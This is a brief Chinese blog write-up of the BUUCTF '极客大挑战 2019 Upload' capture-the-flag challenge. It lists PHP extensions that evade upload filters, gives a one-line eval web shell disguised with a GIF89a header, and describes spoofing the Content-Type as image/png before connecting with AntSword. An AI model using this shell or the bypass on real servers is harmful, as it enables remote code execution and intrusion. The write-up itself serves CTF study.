极客大挑战 2019 Upload

发表于 2021-06-12 本文字数 181 字 阅读时长 1 分钟
  • TSW Security
首页 CTF

[极客大挑战 2019] Upload

1:某些情况下绕过后缀名检测:

php,php3,php4,php5,phtml.pht

2:常用一句话:

GIF89a? <script language="php">eval($_REQUEST[1])</script>

php5 适用
3:文件类型绕过

改成 image/png

上传之后蚁剑连接即可

upload CTF buu 极客大挑战
更新于 2021-07-25 阅读次数 次

请我喝[茶]~( ̄▽ ̄)~*

zeroc 微信支付

微信支付

zeroc 支付宝

支付宝

zeroc 贝宝

贝宝

  • 本文作者: zeroc @Zeroc
  • 本文链接: http://zeroc.ee/2021/06/12/ctf/[极客大挑战 2019]Upload/
  • 版权声明: 本站所有文章除特别声明外,均采用 (CC)BY-NC-SA 许可协议。转载请注明出处!
上一篇 CTF

RoarCTF 2019Easy Calc

下一篇 linux

wireguard vpn安装

  • 强网杯 2019随便注
  • 极客大挑战 2019PHP
  • 网鼎杯 2020 青龙组AreUSerialz
  • 强网杯 2019Upload
  • GXYCTF2019 Ping Ping Ping
  • 护网杯 2018 easy_tornado
  • 极客大挑战 2019 Secret File
  • GYCTF2020 Blacklist
  • 极客大挑战 2019 HardSQL
  • GXYCTF2019 BabySQli
  • 网鼎杯 2018 Fakebook
  • CISCN2019 华北赛区 Day2 Web1 Hack World
  • RoarCTF 2019Easy Calc
  • 极客大挑战 2019 Upload
  • HCTF 2018 admin
  • 极客大挑战 2019 BuyFlag
  • BJDCTF2020 Easy MD5
  • ZJCTF 2019 NiZhuanSiWei
  • SUCTF 2019 CheckIn
  • BUUCTF 2018 Online Tool
  • GXYCTF2019 BabyUpload
  • RoarCTF 2019 Easy Java
  • 强网杯 2019 高明的黑客
  • GXYCTF2019 禁止套娃
  • GWCTF2019 我有一个数据库
  • BJDCTF2020 The mystery of ip
  • BJDCTF2020 ZJCTF,不过如此
  • BJDCTF2020 Mark loves cat
zeroc

zeroc

潜心学习
48 文章
5 分类
72 标签
  • 首页
  • 关于
  • 文章
    • 归档
    • 分类
    • 标签
  • 友達

随机文章

  • 几个简单题目2
  • linux
    防火墙报错汇总
  • CTF
    护网杯 2018 easy_tornado
  • CTF
    GXYCTF2019 禁止套娃
  • learn
    sqlmap使用心得
  • CTF
    BJDCTF2020 The mystery of ip
  • CTF
    极客大挑战 2019 Secret File
  • learn
    Sqli-labs通关记录1-65
  • CTF
    GXYCTF2019 BabySQli
  • CTF
    SUCTF 2019 CheckIn

最新评论

    © 2021 zeroc @ TSW Security
    84k 字|
    基于 Hexo & Theme.Shoka